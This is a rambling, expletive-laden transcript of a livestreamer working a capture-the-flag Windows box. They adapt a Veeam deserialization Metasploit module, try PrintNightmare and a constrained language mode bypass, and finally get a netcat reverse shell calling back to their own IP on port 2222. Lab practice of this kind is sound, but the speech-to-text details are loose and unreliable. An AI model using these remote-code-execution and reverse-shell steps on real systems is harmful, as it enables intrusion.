have said something about the other one also. Right? So that's why I'm not really understanding too well. It's like if it was messed up, then I feel like it should have said something else about the other one. Thus, does this thing need a comma behind it or something like that? Is that what the problem is? I'm wondering. Do you need a comma? Does somebody else need a comma that I'm not realizing it? Good with all that. I think we're good with all that. I mean, he kind of looks the same. I think it's about time to look at a write-up. I don't know what you guys think. I think it might just about be that time to look at a write-up and see what needs to be done here. Official walkthrough. I don't know like what else it wants me to do because I feel like this whole thing, like it's just not even running this anymore. But I feel like that whole thing's correct. It's not showing any exploits. We can't get any other type of shell on there or anything like that. But I feel like this is not wrong. And that's why I don't understand like right there. Well, we got this far and it's like, well, fucking now what? Because I feel like everything on this guy, like, he looks the exact same as everything else. He's there, our command. You know what I'm saying? Like, there's nothing, the commas are all there. There's nothing different between this one, like, right here, and this one, like, right here. Until I got rid of this. That was the only thing that was different the whole time. Which that guy was there in the beginning. From there, there's nothing different between this guy, like, right here, and this guy, like, right here. Comma at the end. Just because I didn't fucking do this or something? Like, is that the thing? Is that what's really going to destroy the whole thing? Like, right there? Do it manually with what? This is the only thing that's exploitable on it. There's no exploits for this. Ready? I remember looking this up last time. The only thing they had was the Metasploit module, from what I remember last time. We might be able to do something. That's cross-site scripting. That's stored cross-site scripting. That's not really do much for us. What's this one like right here? Cross-site request forgery. That's not going to do anything for us. VM1 remote code execution. There's the vulnerability for it. Because I remember we tried to do this last time, like manually like this, and there's nothing out there for it. Backup and replication. That's for a backup, like right there. I don't care about backup replication. We want remote code execution. This is another language. Could always try something else. If we're looking at a write-up, we could always try. Some people say that's bullshit, but you know what? That's why new attacks come out. Could always see if this is going to work like right here. No way. Okay, I'm about to say, is it not vulnerable? I'll say no way. I guess not. But I want to do it, you know, like the correct way. But I mean, shit, we ain't getting it the correct way like right now. So let's go ahead and throw it at it and let's see what happens. Let's find new attacks come out, right? Hate to see it. Hate to see it. Yeah, whenever it's like I'm about to look at it right up, it's always like, well, let's throw this at it. Then we'll look at it right up afterwards and we'll try it that way. No, there's not. Somebody else told me one time they said that's not the intended way to get up. It's like, none of this is actually intended. Nobody intended for us to be able to crack into this different shit. You know what I'm saying? Like, none of this was intended. Like, that makes no, like, they're like, that's not the intended way. Well, sorry to hear that. Oh, it's already in use? Do we already have it on that port too? Because that'll be pretty sweet. Now, I think I already have mine where it's running, and I don't remember which one it is. But I think I already have one where it just runs as soon as it gets out of the machine also. Just so you guys know. So if it all of a sudden just runs, yours most likely will not just do that. Oh, that's one way to do it, like right there. And don't we want to like... Okay, let's actually invoke it like right there, but it will just give us a new user and everything like that. Let's go ahead and just run it. So I don't think we have to do the invoke print nightmare for one of these two. I forget which one. I always forget that Metasploit has a print nightmare module, in all honesty. Okay, so that's not the one that automatically runs. What the hell just happened? Can we not run it? Let's try this one. I don't know where the hell this Python server is even at. So he can't do print nightmare on him, I guess. Constrained language mode? You can break out of that somehow. I know you can break out of that. Yeah, it's a constrained language. Well, it's not an oh well just yet, because there is more stuff we can do. There is this one like right here that we could try. He's probably not going to download it though now, is he? He probably won't actually download that because it's a interpreter DLL file. Is it only a PowerShell downgrade? Is that what we can do? That's not going to work. I don't know why I even tried that. What the hell that even was like right there. Bypass constrained language mode. This is like a PS1 because you keep seeing PowerShell, but no. Oh, it's a DLL. It's not going to let us download it. Is this the same exact thing? Oh, no. I mean, there's the executable like right there. We try it. We try it. Go ahead and try this guy right here for constrained language mode bypass. We'll see what happens. Try download print nightmare, I guess, with that, huh? Okay, we see. Yes, doesn't work. Thank you very much. Wonder if I should make a call back to myself. What if you do something like that? Then we should do something like a LVMP 2222. Make a call back to myself, and I wonder if I'll be off strain language more at that point. That worked very, very well. Alright. That was a cool story. Let's look it up. That was fun. Already did all that. Already did all that. Okay, so he did. He ended up trying to change his also. So he's changed it to a... like how he bolded all that, but we don't see anything else. Cool. Alright, so we have no idea. Windows 64 executable, our command, win command 2. Let's go ahead and open up ours also. Is this ours like right here? Yeah, win command 1. Alright, let's go ahead and see if we got pretty close to the same thing that he has. So he has a Windows custom command. I have Windows Ryan command, whatever. Arc, our command. Type, win command 1, win command 2, whatever. Default options. Payload, Windows x64 executable. Boom, boom, boom. Default target 2. Going through WF10. Notes. Okay. We didn't mess with that at all. Comes down. There. Register options. Boom, boom. Opt R port 2005. Opt string.new. Okay, that looks good. That guy. Then we go to command. Command, comma. That guy like right there. We got him. True, comma. Threw this into there. Command to execute. Okay, he's saying he just wants to do a ping like right there. He then pretty much cuts it out. I wonder if I have to do something like this. Is it this like right here that's messing us up? I wonder if it's that right there that's messing us up. Because his... then he has the opt string new. But he doesn't have... oh yeah, he does. He has a comma like right there. Never mind. Comma. Opt string new. Host info name. And it's the same stuff that we have because we just copy and paste for the other one. Boom, boom. We can get rid of that, I think. There. I wonder if that's what was messing up was that. And then we also threw in a... under type. Yep, right here. We didn't touch anything else till we got down to type, which he has a case target type, win command 2, ours is command 1, execute command, data store command. And that's everything that we have and everything that he has. Let's go ahead and try to open up Metasploit again then. If that doesn't work, I'm just going to copy and paste his into mine and see what happens. Still not going to work. Okay. So let's go ahead and do this then. Let's see if this works. Let's see if it's just a new version of Metasploit. Because we're on version 6. He was probably on version 4 when this box came out or some shit. There's that. That is totally jacked up. Don't think it really matters. I think with Ruby it's just prettiness. I don't think spaces actually matter with Ruby. I think it's just the prettiness. Let's see if that works. No, it does not. We actually got worse. It got freaking worse. Wow. I don't think spaces matter with Ruby, do they? I think it's only for prettiness that they do that. That's going to matter, like right there, though. Obviously. So other than that, every single thing looked the exact same of what we had. So, no, that got worse. I don't think we're getting in this guy. I mean, that's the actual walkthrough itself. Okay. Let's go ahead and try this one. Let's see what this guy did. Windows x64. Put in new opstring.new. And then put in a type. Command data store. Metasploit? I mean, we can still try it. We can still call back to ourselves. That's it, the box. Okay, I'm about to say that's it. The box is still up and running. Back on that session. Is that how you do it? Or is it print nightmare? Shit, I already forgot who I was. That's copied now. We'll run that. This was running interpreter one, so I don't think this one's specifically going to work. But we can try to mess with it from there. Why does it run on that? God damn it. 1 second. There we go. Let's try it. We're trying to upgrade Shell to Interpreter Recessions Packing 1. I didn't even try it, Oreo, just because like the Windows Defender's running, and I feel like that uploads of interpreter, like a executable or DLL or whatever. I feel like it's not gonna be able to do it, so I didn't even try it. Yeah, see, no session was created. Let's go ahead and try to do a Let's go ahead and try to do a set payload. Let's go ahead and try to do a payload, something different. To like a Windows command or something like that, Windows execute. Let's go and try something like that. She's not about to expire. Wasn't able to do that. Probably gonna tell me incorrect type or something like that. There's an execute. That's literally what we were trying to do is execute, so I don't understand why. PS1 to EXE2 again? The what? I just don't think we're going to be able to get into it. I think fucking we copy and pasted the exact exploit the guy did, and there's like 40 problems with it. I think he was probably using a different Metasploit version. We're just not going to be able to do it. That's all anymore. It's just not going to work anymore. Unless, we have better Ruby programming skills or something like that, which we don't. I just don't think we're going to be able to get it anymore. That's all. Yeah, I just think that this one's a lost cause. Until I decide to go to a, get a college degree on Ruby, which will never happen, so it's going to be a lost cause. I mean, that's all there really is to it for this one. It's not gonna be able to load anything on it. Alright, well, that was fun. Both the exploits we did the same exact thing with. That's about it, like right there. Nothing really else there for us. So, if we can't get past this, also we can't get past the Sirius, because the Sirius, I think, goes off of all three of those guys also. So, I want to know when the last time someone actually completed this was. You know? This is, I think, the same one that we were just looking at. No, this one looks a little bit different. Okay, what's this one? Due to my triumphing suspicion, I couldn't explore my write-up, so here's the flag. Oh. Okay. Set. The box is set. But yeah, I just think that it's a lost cause now. We literally copy and pasted his exact exploit, and that shit don't work. I don't think that copy and pasting was really the best idea either. But I mean, it didn't really say what it was actually doing anywhere, so just kind of was just like, yeah, we did stuff, and then it worked. Oh, okay. So I mean, oh fucking well. Look at that, we're getting somewhere. We're getting further. 97 and 98, huh? I don't know if that even refers to the line or what that refers to, but I feel like it refers to the line 97, 98. Which was the same thing that we had before. Yeah, well, it's 10 p.m. here now. Next one's going to be a raid. That's going to be on to the next one. Because we're going to be doing Windows boxes all day tomorrow. Holy shit, that actually loaded. Hold up. Still not loading up mine. Why, dude? It's fucking right. It's in your guy's shit. VM1 agent deserialization underscore Ryan. VM1 agent deserialization underscore Ryan. It's in your fucking file, you dickwad. Why? User, share, Metasploit framework, modules, exploits, Windows, miscellaneous, VM1 agent deserialization. Okay, so it's in the same fucking place. Why won't you work now? Now what's the problem? Like, what? What do you want now? Oh my god, it pisses me off, man. Sometimes it's like, what, dude? What is your major malfunction now? Why is it Ryan in there? Probably because they do a sudo apt update though. Nope. Why would it show up? It's just sitting in the directory where it actually fucking looks to do stuff. So why would it show up? You know what I'm saying? That would make goddamn sense. This box is acting like bulk fuel, motherfuckers. We already did a sudo update. That's what we did last time. That's what we've been doing every single time. Wait, we can do update. Is that what you're talking about? Nope. We can go into, you talking about going into Metasploit and typing in update DB? Shouldn't it update automatically? I thought they got rid of that in like Metasploit version 4. I guess not. All right. Thank you. It's still not there. I mean, not like, I don't know why I thought that something's going to change about that. That would have been fucking awesome if it did. At least that's here now. Hey, thanks a lot for follow, Bay Bear. Let's go and CD into user, share, Metasploit framework, modules, exploits, Windows. Let's see if it looks any different. I guess. Now where? Module exploits Windows. Oh, miscellaneous. Okay. I'm like, what the fuck? Where'd it go? Alright, so that one has the same exact rights as that one. That's why I want to make sure that the rights were the same. What Metasploit path requirement, though? It's in the same exact path. I mean, they are there. They're in. One's above the other one. It's only going to that one. Supposedly it doesn't fucking exist. It's sitting right there. Oh, you didn't want to be on time, Frank. Trust me. It's getting more lost now somehow. Now it's frozen. That doesn't work anymore, though. This thing needs more than help. Well, I don't think we need help with it anymore. I think it actually is working now, the module. Just now it just doesn't actually show up. Because it's in the Metasploit framework file where they show up. So... we can do a load path. Let's try that. This ain't working like right here. I don't know what the hell's going on there. Let's go ahead and do a PWD load path. Then we can give it the whole path to modules exploits. Okay, let's go ahead and do a load path user. Shit. Share. Metasploit framework modules exploit Windows miscellaneous. Veeam. Can I even do that? Nope. Windows miscellaneous. Loaded 0 modules. Let's go. Good. Alright. Let's freaking go. That's what I see like right there. Oh, it's straightforward. It's not very difficult. Like you put it in there and it finds that path. It's nothing fucking pseudo magical, but with this box, might as well be building a fucking rocket to go to goddamn Pluto. 15 points. Oh, look at that. You reload all? Man, we're going to get those 15 points sooner or later. What's up, Bubblegum? How you doing? That was super fucking useful like right there. Nope. Fuck it. Alright. Been going at this for how long now? How many hours? 3? Suppose the machine isn't even fucking on anymore. Yeah, the machine's not even on. We've been going at this shit for 3 hours just trying to get a fucking module going. 3.5 hours. Been going at this fucking piece of shit. To try to get a module to load that's in the path that's literally the fucking same module as this dickwad, like right here. You know, I want to see something. I want to fucking see something real quick. I want to copy this guy to this guy. And I want to see what the hell happens. Because now it is literally the same fucking thing. 5632, 5632. It is the same exact exploit. I want to see if this one all of a sudden shows up or not. Okay, so that one shows up now. So there's obviously a damn problem with this thing. Which means that the exploit that we literally got from the walkthrough does not work. That's what that tells me. That's why I see like right there. The official walkthrough exploit doesn't work. Alright. Oh, line by frickin' line. This is also different than ours too. Can't tell. This looks oddly familiar. It's like deja vu. Damn, this looks oddly familiar. Alright, that should be it. Should be able to save that now. Which it is now saved. And we should be able to try to use one. Let's see what happens here. Show options. Let's see if they actually work like right there, actually. No, because it's still the same that thing. We have to exit out of here. We got to go back into it. And we're probably going to get some type of problem. And then it's called bedtime after that. Oh, we didn't get a problem. Let's see what happens. Oh, we got a command. Let's freaking go. Oh, crap. The box isn't up and running, is it? That's not really what I want to do, like right there. But the box isn't running anymore. Shit, fuck, Maynard. Let's see. Let's see if the box is lying to me. Yeah, that ain't... Oh, the box is lying to me. Okay. Okay. We can do this. Now we just need to have a callback to ourselves with a command. So we can set Windows... Oh, man. Windows... x64 execute. Right? That was the one that we made, right? The command is now nc-tac-e, so let's go ahead and do an nc lvmp2. Alright, I have no idea what the hell we did different between those two, but we did something different. Let's go ahead and type in run. And let's see if we can call back over here. Still saying that malicious handshake. I don't know how much I trust that malicious handshake right there. Nope, that's not going to work. Set target to Windows. Set target to Windows custom command. So 3. Now we should be on, our target should be Windows custom command. There we go. Let's go ahead and run that. We still have this over here. Let's see what happens. See if we get anything back. Ain't gonna work. Still not gonna work. You know why? Because we have to set command to C temp and C .exe tac-e command boom boom boom. Do we run that now? Or do we have to change up the file? We have to change up the file, I don't know. Okay, let's try it with PowerShell. Okay, that's fucking annoying shit. Glad I can't see anything. There we go. Try to run that. So it's going to C temp running nc.exe. So try to call back PowerShell to us. 10.13.26.184 on port 2222. Nothing. So after all that, nothing. Can we actually get back in this guy? Is he actually still up and running? He is. So he's still up and running. So that still is working. I mean, that shouldn't work at all, but we're going to try it. Yeah, that's what I thought. Let's actually change up the file this time. Oh, that's going to be tomorrow. Well, I don't know. What day is it for you, like, right now? It's going to be tomorrow for me. I don't know what day it is for you, though. Wrong file. The really long one's going to be Saturday morning for me, Friday evening for East Coast. I mean, this one's turning into a really long one. That counts for anything. You know what? I wonder if we can actually get... What if we do something like this? So we can actually see if it's actually even coming back to us. Let's go ahead and save that. And then we'll exit off here. We'll go back into it. Try hack me. You can put in Krypton. You can put in links in this. Hold up. Oh, let's fucking go! It actually fucking worked. It just took like 10 minutes. Let's go! Holy shit! That freaking worked. Now the real question is, do we just upload the 3-hour video straight to YouTube, or do we actually cut it and just show the finalized version of this thing? Here is the finalized version of this guy. Alright? What we did, we have Wing Command 2 with Windows x64 execute, right? This is not even final. That's actually going to be a netcat one, like right there. We do need a let's go emote. This was actually a netcat command, but it's not like it really matters. That just said like, hey, this is what you can type in, right? And then we went ahead and we did a Wing Command 2 execute command from the data store command. So it might have actually, let me see, data store. So it's whatever we put in for the command, right? So we ended up running a netcat reverse shell on here. And that's how we got that. It just took forever to actually grab it. It took a while. But we finally got it. I'm thinking, just say that. Yeah, just say, hey, jump to 3 hours and 44 minutes for the result. Make a timestamp, or no, I'll say in the very beginning. I'll say something at the very beginning, like, hey, 2 hours of this is us struggling with something. You know, like, jump to, what is the uptime like right now? Where are we sitting at? Oh no, we've only been up for 2.5 hours on this box. So that's actually not too bad, because we spent an hour on another box. That's actually not too bad.